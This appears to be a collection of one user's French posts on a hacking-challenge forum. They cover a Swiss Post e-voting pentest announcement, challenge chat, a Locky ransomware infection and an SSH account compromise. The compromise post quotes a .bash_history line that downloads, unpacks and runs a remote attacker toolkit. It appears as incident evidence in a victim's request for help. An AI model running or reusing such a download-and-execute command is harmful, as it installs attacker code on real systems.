La transparence Suisse nous défie !

Motivés ?
Durant un mois, la Poste (suisse) va simuler une votation fédérale et autorisera différentes attaques sur son système de votation électronique.
La poste est convaincue que seul un système totalement transparent est pérenne. Par cette simulation, et après enregistrement des pen-testeurs, elle donne accès au code source et carte d'électeurs et tout ce qu'il faut pour disséquer son système.
L'objectif étant, bien sur, de corriger le système au plus vite.
C'est ouvert à tous et ceux qui trouveront des failles plus ou moins critiques seront rémunérés. Rémunération variable selon l'importance des conséquences de la faille. (détails ici : https://www.onlinevote-pit.ch/details/ (english)

Le bog de l'annonce (fr): https://www.evoting-blog.ch/fr/pages/2019/test-de-piratage-public-du-systeme-de-vote-electronique-de-la-poste

Le site pour s'enregistrer : (en)

https://onlinevote-pit.ch/

Actuellement il y a 967 hackers inscrits (une majorité de suisses et de français)
Que les meilleurs gagnent !

Peut-on résoudre tous les niveaux de difficultés sans programme?

Alors la, sans hésiter.. oui ! ça reste du sudoku...

Pourrait-on connaître combien de niveaux il y a? Cela permettrait de se rendre compte si ça vaut le coup de passer un peu (beaucoup?) de temps à dev...

Mais ici, je ne vais pas répondre à la place de l'auteur... J'avoue, je me suis poser la même question.
S'il a choisi de ne pas le dire, c'est probablement que ça ajoute du fun à l'épreuve !. Tu peux pas pas t’empêcher de penser "Ah mer...e ! il y en a encore un !

Euh... pour certain valence c'est déjà le noooord...
Et bah, pour moi c'est plutot entre nice et toulon....
Après, ça m'arrive de bouger, pour le taf, mais pas sur Paris.
Et puis, j'ai testé Paris pendant quelques années. J'ai pas envie d'y remettre les pieds. Trop de gens..

Bon , je vais exprimer mon avis, c'est pas si courant!
A part l'historique irc, je connais à peine discord, à cause de mon gamer de fils... ça ressemble à un skype dédié gamer. poua.. berk.
ceci dit, je ne suis pas à l'aise sur irc, j'ai bien essayé, mais je ne connais pas les "codes" de conduite. Tu arrives la dedans, il y a - ou pas - des conversations en cours que tu ne comprends pas ou à peine. et du coup, tu as du mal à t'y insérer. Ou tu es juste spectateur. De plus, difficile pour moi d'être connecté longtemps. j'ai autre chose à faire, j'ai une vie IRL..
Bref, je vote quand même pour IRC. Je ne crois pas aux autres solutions, orales ou la même chose mais plus moderne et exporté vers des serveurs ou tu maitrises rien.. j'aime pas ça. C'est tout.
Alors, je pense qu'il serait bon, si vraiment vous voulez developper le chat sur NC d'en mettre un peut plus sur la page de présentation qu'on a tous pu voir sur le site de NC.
Genre, viendez sur IRC, voici les codes et comment on doit s'y comporter, Si vous avez une question, voici comment vous y prendre, si vous voulez chatter en privé, c'est possible , voici comment faire, si vous vous prenez un rateau, pas la peine de couiner, c'est le jeu, etc...
A discuter sur IRC, quand j'y passes...
balicocat

gros lol....
juste au moment ou j'ai placé UNE partie à 2020 points,
juste le temps de l'admirer et pouf.... elle est plus la !
pour 2000 points en 5 secondes ce n'était pas évident. mon prog me donnait une réponse plutot dans les 30 secondes quand il y arrive !
alors 10000 points. Faut refaire chauffer de nouveaux neurones...

Sans rancune soso

comme je dis divemaga, super sympa comme épreuve !
Alors moi aussi je me suis chauffé...
Allez !, sans mettre d'intelligence dans le bouzin, difficile de dépasser 100 points...
pff va falloir mettre des neurones dans tout ça . et les bons ... (mais qui en doutait ?  )
J'ai bien une idée de stratégie (toute simple) mais , si c'est pas un secret, on peut partager dans ces colonnes nos méthodes de jeu ?
Bien vu également, le tirage aléatoire connu à l'avance, pour le moment, je ne m'en sers pas mais j'imagine que pour attendre les super high scores que je viens de voir au classement, il faut "tricher" un peu et la connaissance du tirage permet d'anticiper. Combien de "coups" d'avance, messieurs les champion ?
bises

bon bon bon... Amis du midi, bon appetit.
Cette news me tente, mais avant de signer, il faudait quand même préciser quelques points.
A quoi un "newser" s'engage-t-il ? Fréquence d'articles, qualité de contenu et de la forme, plaggia (on est pas des journalistes à la recherche d'infos sur le terrain... en tout cas pas moi !). De la traduction de news from US ? Peut on être viré, démissionner, y-a-il un comité de relecture / modération avant publication?...
et la forme ? . Du texte, rien que du texte... genre forum ou plus aérée et agrémentée de schéma, photos... et la pub ? hein ? pas de pub , c'est bien...
Aller pour éviter que quelqu'un ne pose la question, Je suis certain que tout ceci sera du bénévolat. (Et je trouve ça bien)

Voila donc mes premières questions, avant de vous dire si oui je m'engage dans cette évolution.
Ceci dit, j'adore votre site (et depuis longtemps...), La nouvelle version est très bien, sobre sans l'austérité du "web 1.0 " des années 90. ceux qui connaissent netscape sauront de quoi je parle.

un fichier detecté comme "locky"

https://id-ransomware.malwarehunterteam.com/identify.php

Locky
This ransomware has no known way of decrypting data at this time.

It is recommended to backup your encrypted files, and hope for a solution in the future.

Identified by

    sample_extension: .zepto


ça s'annonce mal...

je t'ai envoyé un lien vers le fichier zip (comme pour harvey).
La pièce jointe associée au mail malfaisant.

J'ai creusé un peu et je suis tombé sur ça (entre autre)
https://securelist.com/blog/research/74398/locky-the-encryptor-taking-the-world-by-storm/
je suis allé sur tor aussi... 4.00 Btc. pas donné le hackeur !. vé l'inflation....

Je peux t'envoyer la pj reçu par ma collegue en mp.

Salut à tous.
Rubrique défouloir... pourquoi pas ?. Je ne sais pas ou mettre ma requete...

Une de mes amies s'est fait piéger par un ransonware. Un fichier zip en pièces jointe à un email pro. noyé dans la masse des attestations ,factures, plus un zeste de naïeveté. et paf. un script se lance et au final des dizaines voir plus de fichiers chiffrés. noms modifiés et extension en ".zepto"

De ce que j'ai pu en voir, le script à parcouru l'arborescence "mes documents", chiffré les documents qui s'y trouvent et ajouter un petit html dans chaque dossier qui dit :

vos fichiers ont été chiffrés via RSA/AES
pour les récupérer, rendez vous sur un site web (qui ne réponds pas) ou sur un autre .onion via tor (pas essayé)
votre identifiant est : 3889252CCC3CC34F

bien sur ce site va me demander de raquer pour récuperer ma clef de dechiffrement...

J'ai récupéré le script, que je peux envoyer à qui le souhaite.
après l'avoir remis en forme (pfff...) c'est encore complétement "obfuscated".
Ma question est :
est-il possible de recreer la clef de déchiffrement à partir de ce script ?
perso je sens que ça dépasse mes limites actuelles dans ce language (du java ?) et j'ai pas trop de temps à y consacrer, alors j'en appel à l'aide de la communauté newbiecontest

mouais, j'y penserai !
Ceci dit, c'était une pénétration par ssh sur un seul compte (sans droits sudo)
j'ai désactivé ce compte, re-installé fail2ban (comme un con, je l'avais oublié après avoir changé le DD du PC et réinstalléé le système).
Je dois faire plus selon vous ? tout effacer et réinstaller ? Ces scripts peuvent-ils (à la maniere de virus) infecter d'autres fichiers (hors de son /home/). La désactivation de ce compte ne suffit-elle pas ?


Edit : J'oubliai : merci pour vos réponses (précedentes et à venir)

hacking ou virus de mon ubuntu 9.04?

a l'origine un compte mal protegé et ssh distant (je sais j'ai trop confiance...) pas dans le sudoers (faut quand meme pas pousser)

Qui pourrait m'en dire plus ?


#cat /home/invite/.bash_history
passwd
w
ls
wget www.tradelinux.info/emech/nou.tgz;tar zxvf nou.tgz;cd tester;./start bum
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe

/* le type s'est connecté , a changer le mot de passe, téléchargé 2 archives et executé start

Si vous voulez je poste le nou.tgz qui contient plusieurs scripts
Et si vous etes interressé, je vous donne plus d'infos ce soir
A+
balicocat

[Ubuntu Gusty(7.10)]

Mais je me heurte à un problème récurent sur ma chère machine, fonctionnant sous Ubuntu Gusty(7.10) :  le système se freeze régulièrement, principalement lors de l'exécution de Firefox.

Salut,
marrant, j'ai le même problème sur un portable ACER mais pas sur d'autres machines avec le même OS Ubuntu 7.10
par contre, cela n'arrive QUE quand j'utilise firefox et le système "me rend la main" après quelques secondes. Il à d'ailleurs enregistré tous les clicks et déplacements de souris durant le freeze et me les restitue à grande vitesse au moment ou le freeze s'arrète : effet comique ou perturbant garanti....
bref, je n'ai même pas cherché à savoir pourquoi ni comment... (pas mon genre pourtant !). J'ai tout de suite pensé à un problème matériel (carte vidéo) alors dans ce genre de cas, qui me gene très peu (quelques secondes maximun 2 ou 3 fois par jour...). J'ai pas envie d'y passer des heures...
Le problème sera peut-être résolu en passant à 8.04 ! (mais perso, je n'ai pas encore migré - mon principe : pourquoi changer quand ton marche ? - )

En attendant si cela peut aider la commande  lshw -C display donne

 sudo lshw -C display
  *-display               
       description: VGA compatible controller
       product: G70 [GeForce Go 7600]
       vendor: nVidia Corporation
       physical id: 0
       bus info: pci@0000:01:00.0
       version: a1
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress vga bus_master cap_list
       configuration: driver=nvidia latency=0 module=nvidia
Si tu as la même carte, cela peut-être une piste
Sinon, je ne peux pas faire mieux que de te conseiller d'aller sur les forums ubuntu , en particulier sur celui de ubuntu-fr.org

Oui, mais si tu n'as pas validé, normalement tu as ça :

Une erreur s'est produite !
Le fil de discussion ou la section que vous recherchez a l'air d'être manquant ou inaccessible pour vous.

Regardez plutôt les notes données par ceux qui ont réussi...
Et puis je pense que maintenant que plusieurs personnes ont validé ton épreuve, tu peux en faire autant !


EDIT (après le post de _o_)
Autant pour moi, peut-être qu'un jour je ferai partie du petit monde des concepteurs d'épreuves 
Mais on s'éloigne franchement du topic....